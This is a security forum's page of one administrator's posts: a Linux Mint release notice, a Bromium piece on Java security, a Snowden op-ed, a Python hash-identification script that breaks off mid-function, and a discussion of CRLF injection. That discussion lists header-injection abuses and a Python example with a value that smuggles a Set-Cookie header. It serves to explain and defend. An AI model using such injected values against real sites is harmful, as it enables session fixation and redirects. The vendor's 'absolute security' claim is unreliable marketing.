Nytro
Administrators
  • Posts: 18725
  • Joined
  • Last visited
  • Days Won: 706

Everything posted by Nytro

  1. coolbyte: Wait a few days. I'm not the only one paying, the staff members pay, but it costs something. We'll come back with more information in the next few days.
  2. https://rstforums.com/proiecte/DK_v3.3.zip It's the source, it can be compiled. When I get home.
  3. It seems to be the same problem as the CRLFs in email forms (SMTP and HTTP use the same header delimiter, \r\n): CRLF Injection (CRLF Injection attacks and HTTP Response Splitting - Acunetix), just with a trendier name. Or we can call it HTTP Response Splitting, more generically (HTTP response splitting - Wikipedia, the free encyclopedia). In any case, it is XSS (if the data is not filtered). Instead of generating another set of HTTP headers as the response, you'd better generate HTML/JS code that does who knows what nonsense. For this reason, sure, it's a vulnerability. But here are some ideas:
     - you can set a file download header: "Content-Disposition: attachment; filename=MyFileName.ext" and force the download of a file that comes from a "trusted" source
     - you can set Location to whatever you want, so you have URL redirection, or whatever you like to call it, with "Location"
     - you can set various cookies with "Set-Cookie"
     Strictly regarding what you are saying, that "Cross User Defacement", meaning the possibility of answering with 2 (or more) HTTP responses, it's not a web security problem:
     1. You need that "shared connection", which in practice I don't think is very common
     2. It is a problem, BUT it's a problem in the crappy caching proxy server, NOT in the web application
     Cross-user defacement and web cache poisoning are problems in caching proxy servers. Yes, both in theory and in practice, it is not OK for it to be possible to modify the response headers. It's rather ugly to exploit but it's still a problem, though not a very dangerous one. I'll vote "yes", that it is a security problem, but a "Low" one, not very dangerous. How else could you exploit something like this? Regarding their answer, I think they didn't understand exactly what it's about. The name (Cross User Defacement) seems like a lame piece of crap to me.
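To show the mechanism the post describes and the check that stops it, here is an added example (not code from the post or from the linked articles): a redirect builder that copies the target into the Location header verbatim, next to one that rejects CR, LF and NUL, and a small parser that shows what a client makes of each response. The function names and the sample target are constructed for this example.

```python
# Added example (not part of the original post): how an unvalidated header
# value splits an HTTP response, and the input check that prevents it.
# All names and the sample redirect target are constructed for illustration.

CRLF = "\r\n"


class HeaderInjectionError(ValueError):
    """Raised when a header value would terminate its own header line."""


def build_redirect_unsafe(location):
    """Vulnerable builder: the caller-supplied target is copied into the
    header block verbatim, so a CR/LF inside it ends the Location header
    early and the remainder is parsed as further headers (or a body)."""
    return "HTTP/1.1 302 Found" + CRLF + "Location: " + location + CRLF + CRLF


def safe_header_value(value):
    """Reject CR, LF and NUL in a header value (each ends or corrupts a
    header line). A control character in a redirect target is almost
    always an attack or a bug, so failing closed is the right default;
    percent-encoding is the alternative when the value must be kept."""
    if any(ch in value for ch in ("\r", "\n", "\x00")):
        raise HeaderInjectionError("control character in header value")
    return value


def header_value_is_safe(value):
    """Boolean form of the check, convenient for an input validation layer."""
    try:
        safe_header_value(value)
    except HeaderInjectionError:
        return False
    return True


def build_redirect_safe(location):
    """Hardened builder: same output, but the target is validated first."""
    return ("HTTP/1.1 302 Found" + CRLF
            + "Location: " + safe_header_value(location) + CRLF + CRLF)


def parse_response(raw):
    """Split a raw response into (status line, {name: value}, body) the way
    a naive client would; it shows what the peer actually receives."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


# Constructed sample: a redirect target carrying an embedded CRLF, the
# pattern the post calls CRLF injection / HTTP response splitting.
TAINTED_TARGET = "/home" + CRLF + "Set-Cookie: session=attacker-chosen"

if __name__ == "__main__":
    _, leaked, _ = parse_response(build_redirect_unsafe(TAINTED_TARGET))
    print("headers seen by the client from the unsafe builder:", leaked)
    print("safe builder accepts the tainted target:", header_value_is_safe(TAINTED_TARGET))
```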
  4. 3 warnings which resulted in 3 bans. You talk too much and you talk rubbish.
  5. [h=2]Linux Mint 15 “Olivia” KDE released![/h]
     Written by Clem on Sunday, July 21st, 2013
     The team is proud to announce the release of Linux Mint 15 “Olivia” KDE. Linux Mint 15 Olivia KDE is a vibrant, innovative, advanced, modern looking and full-featured desktop environment. This edition features all the improvements from the latest Linux Mint release on top of KDE 4.10.
     New features at a glance: KDE 4.10; MDM; Software Sources; Driver Manager; Software Manager; System Improvements; Artwork Improvements; Upstream Components. For a complete overview and to see screenshots of the new features, visit: “What’s new in Linux Mint 15 KDE“.
     Important info: PAE required for 32-bit ISOs; EFI support. Make sure to read the “Release Notes” to be aware of important info or known issues related to this release.
     System requirements: x86 processor (Linux Mint 64-bit requires a 64-bit processor. Linux Mint 32-bit works on both 32-bit and 64-bit processors); 1GB RAM; 8 GB of disk space; graphics card capable of 1024×768 resolution; DVD drive or USB port.
     Upgrade instructions: To upgrade from a previous version of Linux Mint follow these instructions. To upgrade from the RC release, simply apply any level 1 and 2 updates (if any) available in the Update Manager.
     Download: Md5 sum: 32-bit: 72fe1cfd477b074a1849dda34430b4b7; 64-bit: 38dd24371ceafe34915eb5cb350217c7. Torrents: 32-bit, 64-bit.
     HTTP Mirrors for the 32-bit DVD ISO: Argentina: Cooperativa Telefonica de Villa Gobernador Galvez Ltda.; Argentina: Xfree; Australia: AARNet; Australia: Internode; Australia: uberglobal; Australia: Western Australian Internet Association; Australia: Yes Optus Mirror; Austria: Goodie Domain Service; Bangladesh: dhakaCom Limited; Bangladesh: IS Pros Limited; Belarus: ByFly; Belgium: Cu.be Solutions; Brazil: Universidade Federal do Parana; Bulgaria: Telepoint; Canada: University of Waterloo Computer Science Club; Czech Republic: Ignum, s.r.o.; Denmark: Development Group Denmark; Denmark: klid.dk; France: GoPotato; France: Gwendal Le Bihan; France: IRCAM; France: Nouknouk; France: Ordimatic; France: RTS Informatique; Germany: Artfiles; Germany: Copahost; Germany: FH Aachen; Germany: GWDG; Germany: killerhorse.eu; Germany: NetCologne GmbH; Greece: Hellenic Telecommunications Organization; Greece: National Technical University of Athens; Greece: University of Crete; Greenland: Tele Greenland; Iceland: Siminn hf; India: Honesty Net Solutions; Ireland: HEAnet; Israel: Israel Internet Association; Italy: GARR; Lithuania: Atviras kodas Lietuvai; Luxembourg: root S.A.; Malaysia: Universiti Teknologi Malaysia Open Source Mirror; Netherlands: NLUUG; Netherlands: Triple IT; New Zealand: University of Canterbury; New Zealand: Xnet; Norway: Communica; Poland: ICM – University of Warsaw; Portugal: CeSIUM – Universidade do Minho; Portugal: Universidade do Porto; Romania: ServerHost; Russia: Yandex Team; Serbia: University of Kragujevac; Singapore: 0x.sg; Singapore: NUS – School of Computing – SigLabs; Slovakia: Rainside; South Africa: University of Free State; South Korea: KAIST; South Korea: NeowizGames corp; Sri Lanka: Lanka Education and Research Network; Sweden: DF – Computer Society at Lund University; Sweden: Portlane; Switzerland: SWITCH; Taiwan: NCHC; Taiwan: Southern Taiwan University of Science and Technology; Taiwan: TamKang University; Thailand: adminbannok.com; Turkey: Linux Kullanicilari Dernegi; Ukraine: OSDN.Org.UA; United Kingdom: Bytemark Hosting; United Kingdom: University of Kent UK Mirror Service; USA: James Madison University; USA: Linux Freedom; USA: MetroCast Cablevision; USA: mirrorcatalogs.com; USA: Nexcess; USA: PSGNet; USA: Secution, LLC.; USA: University of Maryland, College Park; Vietnam: FPT Telecom.
     HTTP Mirrors for the 64-bit DVD ISO: the same list of mirrors as for the 32-bit DVD ISO.
     Enjoy! We look forward to receiving your feedback. Thank you for using Linux Mint and have a lot of fun with this new release!
     Source: The Linux Mint Blog
  6. Relax! Java is OK – and Easy to Secure July 17, 2013 / Simon Crosby It’s become cool, particularly among those that sport Macs, to scoff at Java and pretend that it’s an anachronism that the world doesn’t need. Perhaps it’s a re-enactment by the Apple faithful of Steve Jobs’s disdain for Flash, spurred by Apple’s removal of Java as a default plugin for Safari after Apple itself was compromised by a Java-based attack. After all, who can resist getting in a dig at Larry Ellison’s expense? But the fever pitch around Java is bigger than that. It has grown to the point that the US DHS warned users to disable client-side Java. Talk about shouting into the wind: Java is here to stay – approximately forever. And it can easily be made completely secure. If you need to ask why Java is needed, then you do not work in a real enterprise setting. Last week I visited a leading manufacturer of heavy machinery, whose innovative designs are crucial to its success. It is being heavily targeted as a result. Like many organizations for which IT is not the focus of the business, the IT operations team is stretched thin. They do their best to keep up. The company is being actively attacked using Java as a vector because they are stuck with an old version: They use Oracle R11 as their ERP system, which apparently (I haven’t been able to verify this) requires the client to use Java 1.5.0_17. Upgrading the ERP system would be disruptive, expensive and complex, and banning client side Java is not an option – everyone, from Finance to Engineering, has to use the system. No matter how you look at it, the problem isn’t Java. Nor is it the “You” in “User”. Unlike the countless failed attempts to train users not to click on “seemingly unsafe” links or files, I’m going to assert that user training will never succeed since the attacker is always a step ahead of the trainer. (Unpatched) Java, and un-trainable users are with us to stay. What is the problem? 
Complex application and OS software environments are vulnerable because they offer a huge attack surface. Java has been successfully targeted of late because it is a classic example of a complex software environment, and because of its ubiquity and platform independence. Java meets the economic needs of malware writers: One can target a massive number of deployed systems with one piece of malware. The response of the security and OS vendors is at best, sad. The security industry has nothing more useful to offer than advice on how to un-install, or update the Java plugin. Apple removed Java from Safari last October, and Microsoft FixIt now blocks Java from IE. For its part, Oracle has repeatedly promised to fix Java once and for all, and a recent blog is telling (the highlights are mine): In JDK 7.2, Oracle added enhanced security warnings before executing applets with an old Java runtime… In JDK 7.10, Oracle introduced a security slider configuration option, …. Further, with the release of JDK 7.21, Oracle introduced the following: … With this update … users can prevent the execution of any applets if they are not signed. The default plug-in security settings were changed to further discourage the execution of unsigned or self-signed applets. This change is likely to impact most Java users, and Oracle urges organizations …to sign [their] Applets While Java provides the ability to check the validity of signed certificates … the feature is not enabled by default because of a potential negative performance impact. …In the interim, we have improved our static blacklisting to a dynamic blacklisting mechanism … The Oracle “solution” appears to be “hope the user does the right thing”, “make Java unusable”, and “when all else fails, try blacklisting”. Depending on the user is a bad idea. Making Java unusable is a terrible response, both for Oracle and for its customers. Moreover banning or disabling Java doesn’t address the root of the problem. 
Blacklisting is an article of faith for the AV vendors, but I think we all recognize that its time has come and gone.
A Future Proof Architecture
There is a way out of this mess that enables
- Today’s vulnerable applications & plugins (Flash, Java, Silverlight, Chrome, Firefox, IE, Word, Powerpoint, Excel, PDF, media etc) to run as intended by the vendor
- New mobile-centric, cloud based applications for consumers or enterprises, to deliver a user experience that fully empowers the user, and
- With absolute security.
The way out is Bromium vSentry. We use hardware isolation on a per-task basis - to protect the system from every attack. When the next zero day comes along, the attacker will be unable to steal any information or gain access to the corporate network. Moreover, the attacker and all persisted state will be simply discarded as soon as the user closes the task window. No remediation. No change to the applications or to the end user experience. And if the endpoint is attacked, Bromium LAVA will provide live attack visualization, with complete forensic analysis – delivered instantly to the SOC. Check out our new Safely Use Java Apps page to learn more.
Source: Relax! Java is OK – and Easy to Secure | A Collection of Bromides on Infrastructure
  7. Look at yourselves before criticizing others for not doing anything. Think of it this way: "What the hell have I done in the last 2-3 years since I've been on this forum?" If the answer is: "Look, I've done 2 projects, I've written a few hundred lines of code, I've read 3 tutorials, I've helped a few people solve their problems", you are on the right track. If the answer is: "Well, I jerked off until my hand ended up in a cast, I cursed at 200 people for not agreeing with me and I think I'm damn smart, I learned a lot from Nora pentru mama", you should ask yourselves a few questions.
  8. Nice
  9. C++ OR Java? Choose. For C++, "physical" books, which you can also find online: - C++ manual complet, Herbert Schildt - C++ pentru incepatori, vol. I si II, Liviu Negrescu - Totul despre C si C++, Kris Jamsa. For Java: - Java de la 0 la expert. Look in the libraries.
  10. Edward Snowden Is No Traitor Posted By Philip Giraldi On July 16, 2013 @ 1:18 am There are a number of narratives being floated by the usual suspects to attempt to demonstrate that Edward Snowden is a traitor who has betrayed secrets vital to the security of the United States. All the arguments being made are essentially without merit. Snowden has undeniably violated his agreement to protect classified information, which is a crime. But in reality, he has revealed only one actual secret that matters, which is the United States government’s serial violation of the Fourth Amendment to the Constitution through its collection of personal information on millions of innocent American citizens without any probable cause or search warrant. That makes Snowden a whistleblower, as he is exposing illegal activity on the part of the federal government. The damage he has inflicted is not against U.S. national security but rather on the politicians and senior bureaucrats who ordered, managed, condoned, and concealed the illegal activity. First and foremost among the accusations is the treason claim being advanced [1] by such legal experts as former Vice President Dick Cheney, Speaker of the House John Boehner, and [2] Senator Dianne Feinstein. The critics are saying that Snowden has committed treason because he has revealed U.S. intelligence capabilities to groups like al-Qaeda, with which the United States is at war. Treason is, in fact, the only crime that is specifically named and described in the Constitution, in Article III: “Treason against the United States, shall consist only in levying War against them, or in adhering to their Enemies, giving them Aid and Comfort.” Whether Washington is actually at war with al-Qaeda is, of course, debatable since there has been no declaration of war by Congress as required by Article I of the Constitution. 
Congress has, however, passed legislation, including the Authorization for Use of Military Force, empowering the President to employ all necessary force against al-Qaeda and “associated” groups; this is what Cheney and the others are relying on to establish a state of war. But even accepting the somewhat fast and loose standard for being at war, it is difficult to discern where Snowden has been supporting the al-Qaeda and “associated groups” enemy. Snowden has had no contact with al-Qaeda and he has not provided them with any classified information. Nor has he ever spoken up on their behalf, given them advice, or supported in any way their activities directed against the United States. The fallback argument that Snowden has alerted terrorists to the fact that Washington is able to read their emails and listen in on their phone conversations—enabling them to change their methods [3] of communication—is hardly worth considering, as groups like al-Qaeda have long since figured that out. Osama bin Laden, a graduate in engineering, repeatedly warned his followers not to use phones or the Internet, and he himself communicated only using live couriers. His awareness of U.S. technical capabilities was such that he would wear a cowboy hat [4] when out in the courtyard of his villa to make it impossible for him to be identified by hovering drones and surveillance satellites. Attempts to stretch the treason argument still further by claiming that Snowden has provided classified information to Russia and China are equally wrong-headed, as the U.S. has full and normally friendly diplomatic relations with both Moscow and Beijing. Both are major trading partners. Washington is not at war with either nation and never has been apart from a brief and limited intervention in the Russian Civil War in 1918. Nor is there any evidence that Snowden passed any material directly to either country’s government or that he has any connection to their intelligence services. 
Then there is the broader “national security” argument. It goes something like this: Washington will no longer be able to spy on enemies and competitors in the world because Snowden has revealed [5] the sources and methods used by the NSA to do so. Everyone will change their methods of communication, and the United States will be both blind and clueless. Well, one might argue that the White House has been clueless for at least 12 years, but the fact is that the technology and techniques employed by NSA are not exactly secret. Any reasonably well educated telecommunications engineer can tell you exactly what is being done, which means the Russians, Chinese, British, Germans, Israelis, and just about everyone else who has an interest is fully aware of what the capabilities of the United States are in a technical sense. This is why they change their diplomatic and military communications codes on a regular basis and why their civilian telecommunications systems have software that detects hacking by organizations like NSA. Foreign nations also know that what distinguishes the NSA telecommunications interception program is the enormous scale of the dedicated resources in terms of computers and personnel, which permit real time accessing of billions of pieces of information. NSA also benefits from the ability to tie into communications hubs located in the continental United States or that are indirectly accessible, permitting the U.S. government to acquire streams of data directly. The intelligence community is also able to obtain both private data and backdoor access to information through internet, social networking, and computer software companies, the largest of which are American. Anyone interested in more detail on how the NSA operates and what it is capable of should read Jim Bamford’s excellent books [6] on the subject. The NSA’s capabilities, though highly classified, have long been known to many in the intelligence community. 
In 2007, I described [7] the Bush administration’s drive to broaden the NSA’s activities, noting that The president is clearly seeking open-ended authority to intercept communications without any due process, and he apparently intends to do so in the United States… House Republican leader John Boehner (OH), citing 9/11, has described the White House proposal as a necessary step to ‘break down bureaucratic impediments to intelligence collection and analysis.’ It is not at all clear how unlimited access to currently protected personal information that is already accessible through an oversight procedure would do that. ‘Modernizing’ FISA would enable the government to operate without any restraint. Is that what Boehner actually means? It was clear to me that in 2007 Washington already possessed the technical capability to greatly increase its interception of communications networks, but I was wrong in my belief that the government had actually been somewhat restrained by legal and privacy concerns. Operating widely in a permissive extralegal environment had already started [8] six years before, shortly after 9/11, under the auspices of the Patriot Act and the Authorization for Use of Military Force. The White House’s colossal data mining operation has now been exposed by Edward Snowden, and the American people have discovered that they have been scrutinized by Washington far beyond any level that they would have imagined possible. Many foreign nations have also now realized that the scope of U.S. spying exceeds any reasonable standard of behavior, so much so that if there are any bombshells [9] remaining in the documents taken by Snowden they would most likely relate to the specific targets of overseas espionage. 
Here in the United States, it remains to be seen whether anyone actually cares enough to do something about the illegal activity while being bombarded with the false claims [10] that the out of control surveillance program “has kept us safe.” It is interesting to observe in passing that the revelations derived from Snowden’s whistleblowing strongly suggest that the hippies and other counter-culture types who, back in the 1960s, protested that the government could not be trusted actually had it right all along. Philip Giraldi, a former CIA officer, is executive director of the Council for the National Interest. Source: The American Conservative
  11. [h=2]Hash Detector Tool[/h]
     Since 2009, when I wrote "The String Decoding Process" (published by hakin9 magazine), I have used crafted tools to automatically decode strings (some of them have been published on this blog). Decoding strings turns out to be pretty hard, especially nowadays when many encoding algorithms are commonly used across plenty of "daily life tools". Understanding what encoding we are facing becomes really important if we are analyzing hashing. Let's assume we've just got a file including hundreds of different hash strings: how do we identify what kind of hashing algorithm has been used? Having a list of hashes that could potentially "hide" passwords or important data, having the power of a bruteforce machine and the right tools to attack the hash list without knowing what algorithm has been used could be pretty nasty for attackers. Indeed, attackers might have a difficult time attacking hashes without knowing what the generation algorithm is. Surfing on this "painful wave", I decided to share some pretty Python code that helped me out in solving this specific problem. The script can be downloaded here (pastebin). The following image shows how simple the script is, and how easy it could be to update it with new hashing algorithms. If you are planning to add new features to the script, please give me the diff file, so that we can create a more generic tool able to detect as many different hashing algorithms as possible.
     [Image: HashFinder.py (click to enlarge)]
     The script is quite modular and easy to update. What you need to do is to add your new hashing function with its own identifier into the "algorithms" array (let's see the following image).
     [Image: Algorithms array list: easy to expand (click to enlarge)]
     After having filled up the "algorithms" array, you need to add the new function which finds out if the string you are processing might be generated (or not) from the hash algorithm you've just "declared" in the "algorithms" array. The following image shows you some examples already implemented.
     [Image: Functions that perform the detection (click to enlarge)]
     Finally, in a very quick'n'dirty way, you want to process the input string by adding the generated function to the main flow.
     [Image: Adding functions to control flow (click to enlarge)]
     Hope it could be useful to everybody, enjoy your new hash detector tool!
#!/usr/bin/env python
import sys

logo = '''
#########################################################################
#   modified, adapted and encreased for www.marcoramilli.blogspot.com   #
#########################################################################'''

# identifier -> algorithm name; the detectors below append identifiers to "jerar"
algorithms = {
    "102020": "ADLER-32", "102040": "CRC-32", "102060": "CRC-32B",
    "101020": "CRC-16", "101040": "CRC-16-CCITT", "104020": "DES(Unix)",
    "101060": "FCS-16", "103040": "GHash-32-3", "103020": "GHash-32-5",
    "115060": "GOST R 34.11-94", "109100": "Haval-160", "109200": "Haval-160(HMAC)",
    "110040": "Haval-192", "110080": "Haval-192(HMAC)", "114040": "Haval-224",
    "114080": "Haval-224(HMAC)", "115040": "Haval-256", "115140": "Haval-256(HMAC)",
    "107080": "Lineage II C4",
    "106025": "Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))",
    "102080": "XOR-32", "105060": "MD5(Half)", "105040": "MD5(Middle)",
    "105020": "MySQL", "107040": "MD5(phpBB3)", "107060": "MD5(Unix)",
    "107020": "MD5(Wordpress)", "108020": "MD5(APR)", "106160": "Haval-128",
    "106165": "Haval-128(HMAC)", "106060": "MD2", "106120": "MD2(HMAC)",
    "106040": "MD4", "106100": "MD4(HMAC)", "106020": "MD5",
    "106080": "MD5(HMAC)", "106140": "MD5(HMAC(Wordpress))", "106029": "NTLM",
    "106027": "RAdmin v2.x", "106180": "RipeMD-128", "106185": "RipeMD-128(HMAC)",
    "106200": "SNEFRU-128", "106205": "SNEFRU-128(HMAC)", "106220": "Tiger-128",
    "106225": "Tiger-128(HMAC)", "106240": "md5($pass.$salt)",
    "106260": "md5($salt.'-'.md5($pass))", "106280": "md5($salt.$pass)",
    "106300": "md5($salt.$pass.$salt)", "106320": "md5($salt.$pass.$username)",
    "106340": "md5($salt.md5($pass))", "106360": "md5($salt.md5($pass).$salt)",
    "106380": "md5($salt.md5($pass.$salt))", "106400": "md5($salt.md5($salt.$pass))",
    "106420": "md5($salt.md5(md5($pass).$salt))", "106440": "md5($username.0.$pass)",
    "106460": "md5($username.LF.$pass)", "106480": "md5($username.md5($pass).$salt)",
    "106500": "md5(md5($pass))", "106520": "md5(md5($pass).$salt)",
    "106540": "md5(md5($pass).md5($salt))", "106560": "md5(md5($salt).$pass)",
    "106580": "md5(md5($salt).md5($pass))", "106600": "md5(md5($username.$pass).$salt)",
    "106620": "md5(md5(md5($pass)))", "106640": "md5(md5(md5(md5($pass))))",
    "106660": "md5(md5(md5(md5(md5($pass)))))", "106680": "md5(sha1($pass))",
    "106700": "md5(sha1(md5($pass)))", "106720": "md5(sha1(md5(sha1($pass))))",
    "106740": "md5(strtoupper(md5($pass)))", "109040": "MySQL5 - SHA-1(SHA-1($pass))",
    "109060": "MySQL 160bit - SHA-1(SHA-1($pass))", "109180": "RipeMD-160(HMAC)",
    "109120": "RipeMD-160", "109020": "SHA-1", "109140": "SHA-1(HMAC)",
    "109220": "SHA-1(MaNGOS)", "109240": "SHA-1(MaNGOS2)", "109080": "Tiger-160",
    "109160": "Tiger-160(HMAC)", "109260": "sha1($pass.$salt)", "109280": "sha1($salt.$pass)",
    "109300": "sha1($salt.md5($pass))", "109320": "sha1($salt.md5($pass).$salt)",
    "109340": "sha1($salt.sha1($pass))", "109360": "sha1($salt.sha1($salt.sha1($pass)))",
    "109380": "sha1($username.$pass)", "109400": "sha1($username.$pass.$salt)",
    "1094202": "sha1(md5($pass))", "109440": "sha1(md5($pass).$salt)",
    "109460": "sha1(md5(sha1($pass)))", "109480": "sha1(sha1($pass))",
    "109500": "sha1(sha1($pass).$salt)", "109520": "sha1(sha1($pass).substr($pass,0,3))",
    "109540": "sha1(sha1($salt.$pass))", "109560": "sha1(sha1(sha1($pass)))",
    "109580": "sha1(strtolower($username).$pass)", "110020": "Tiger-192",
    "110060": "Tiger-192(HMAC)", "112020": "md5($pass.$salt) - Joomla",
    "113020": "SHA-1(Django)", "114020": "SHA-224", "114060": "SHA-224(HMAC)",
    "115080": "RipeMD-256", "115160": "RipeMD-256(HMAC)", "115100": "SNEFRU-256",
    "115180": "SNEFRU-256(HMAC)", "115200": "SHA-256(md5($pass))",
    "115220": "SHA-256(sha1($pass))", "115020": "SHA-256", "115120": "SHA-256(HMAC)",
    "116020": "md5($pass.$salt) - Joomla", "116040": "SAM - (LM_hash:NT_hash)",
    "117020": "SHA-256(Django)", "118020": "RipeMD-320", "118040": "RipeMD-320(HMAC)",
    "119020": "SHA-384", "119040": "SHA-384(HMAC)", "120020": "SHA-256",
    "121020": "SHA-384(Django)", "122020": "SHA-512", "122060": "SHA-512(HMAC)",
    "122040": "Whirlpool", "122080": "Whirlpool(HMAC)",
}

# The main flow of the full script (reading the string to analyse, calling every
# detector and printing the names looked up in "algorithms") is not part of this
# excerpt, so the two globals the detectors rely on are defined here to make it
# runnable: "hash" is the string under analysis (first command-line argument)
# and "jerar" collects the identifiers of the algorithms it may come from.
hash = sys.argv[1] if len(sys.argv) > 1 else ''
jerar = []

# String class checks used by the detectors:
#   hash.islower()  lowercase
#   hash.isdigit()  numeric
#   hash.isalpha()  letters
#   hash.isalnum()  alphanumeric
# Each detector holds a sample hash of the algorithm, compares the length and
# character class of the input with it, and appends the identifier on a match.


def CRC16():
    hs = '4607'
    if len(hash) == len(hs) and not hash.isalpha() and hash.isalnum():
        jerar.append("101020")


def CRC16CCITT():
    hs = '3d08'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("101040")


def FCS16():
    hs = '0e5b'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("101060")


def CRC32():
    hs = 'b33fd057'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("102040")


def ADLER32():
    hs = '0607cb42'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("102020")


def CRC32B():
    hs = 'b764a0d9'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("102060")


def XOR32():
    hs = '0000003f'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("102080")


def GHash323():
    # all-digit sample: the check requires a purely numeric input
    hs = '80000000'
    if len(hash) == len(hs) and hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("103040")


def GHash325():
    hs = '85318985'
    if len(hash) == len(hs) and hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("103020")


def DESUnix():
    # DES crypt output is not alphanumeric (it may contain '.' and '/'), so no isalnum() check
    hs = 'ZiY8YtDKXJwYQ'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha():
        jerar.append("104020")


def MD5Half():
    hs = 'ae11fd697ec92c7c'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("105060")


def MD5Middle():
    hs = '7ec92c7c98de3fac'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("105040")


def MySQL():
    hs = '63cea4673fd25f46'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("105020")


def DomainCachedCredentials():
    hs = 'f42005ec1afe77967cbc83dce1b4d714'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106025")


def Haval128():
    hs = 'd6e3ec49aa0f138a619f27609022df10'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106160")


def Haval128HMAC():
    hs = '3ce8b0ffd75bc240fc7d967729cd6637'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106165")


def MD2():
    hs = '08bbef4754d98806c373f2cd7d9a43c4'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106060")


def MD2HMAC():
    hs = '4b61b72ead2b0eb0fa3b8a56556a6dca'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106120")


def MD4():
    hs = 'a2acde400e61410e79dacbdfc3413151'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106040")


def MD4HMAC():
    hs = '6be20b66f2211fe937294c1c95d1cd4f'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106100")


def MD5():
    hs = 'ae11fd697ec92c7c98de3fac23aba525'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106020")


def MD5HMAC():
    hs = 'd57e43d2c7e397bf788f66541d6fdef9'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106080")


def MD5HMACWordpress():
    hs = '3f47886719268dfa83468630948228f6'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106140")


def NTLM():
    hs = 'cc348bace876ea440a28ddaeb9fd3550'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106029")


def RAdminv2x():
    hs = 'baea31c728cbf0cd548476aa687add4b'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106027")


def RipeMD128():
    hs = '4985351cd74aff0abc5a75a0c8a54115'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106180")


def RipeMD128HMAC():
    hs = 'ae1995b931cf4cbcf1ac6fbf1a83d1d3'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106185")


def SNEFRU128():
    hs = '4fb58702b617ac4f7ca87ec77b93da8a'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106200")


def SNEFRU128HMAC():
    hs = '59b2b9dcc7a9a7d089cecf1b83520350'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106205")


def Tiger128():
    hs = 'c086184486ec6388ff81ec9f23528727'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106220")


def Tiger128HMAC():
    hs = 'c87032009e7c4b2ea27eb6f99723454b'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106225")


def md5passsalt():
    hs = '5634cc3b922578434d6e9342ff5913f7'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106240")


def md5saltdashmd5pass():
    # md5($salt.'-'.md5($pass)); renamed: the original listing defined md5saltmd5pass twice,
    # so this detector was shadowed by the one for 106340 and never ran
    hs = '245c5763b95ba42d4b02d44bbcd916f1'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106260")


def md5saltpass():
    hs = '22cc5ce1a1ef747cd3fa06106c148dfa'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106280")


def md5saltpasssalt():
    hs = '469e9cdcaff745460595a7a386c4db0c'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106300")


def md5saltpassusername():
    hs = '9ae20f88189f6e3a62711608ddb6f5fd'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106320")


def md5saltmd5pass():
    hs = 'aca2a052962b2564027ee62933d2382f'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106340")


def md5saltmd5passsalt():
    hs = 'de0237dc03a8efdf6552fbe7788b2fdd'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106360")


def md5saltmd5_passsalt():
    # md5($salt.md5($pass.$salt)); renamed for the same reason as md5saltdashmd5pass:
    # the original reused the name md5saltmd5passsalt, shadowing the detector for 106360
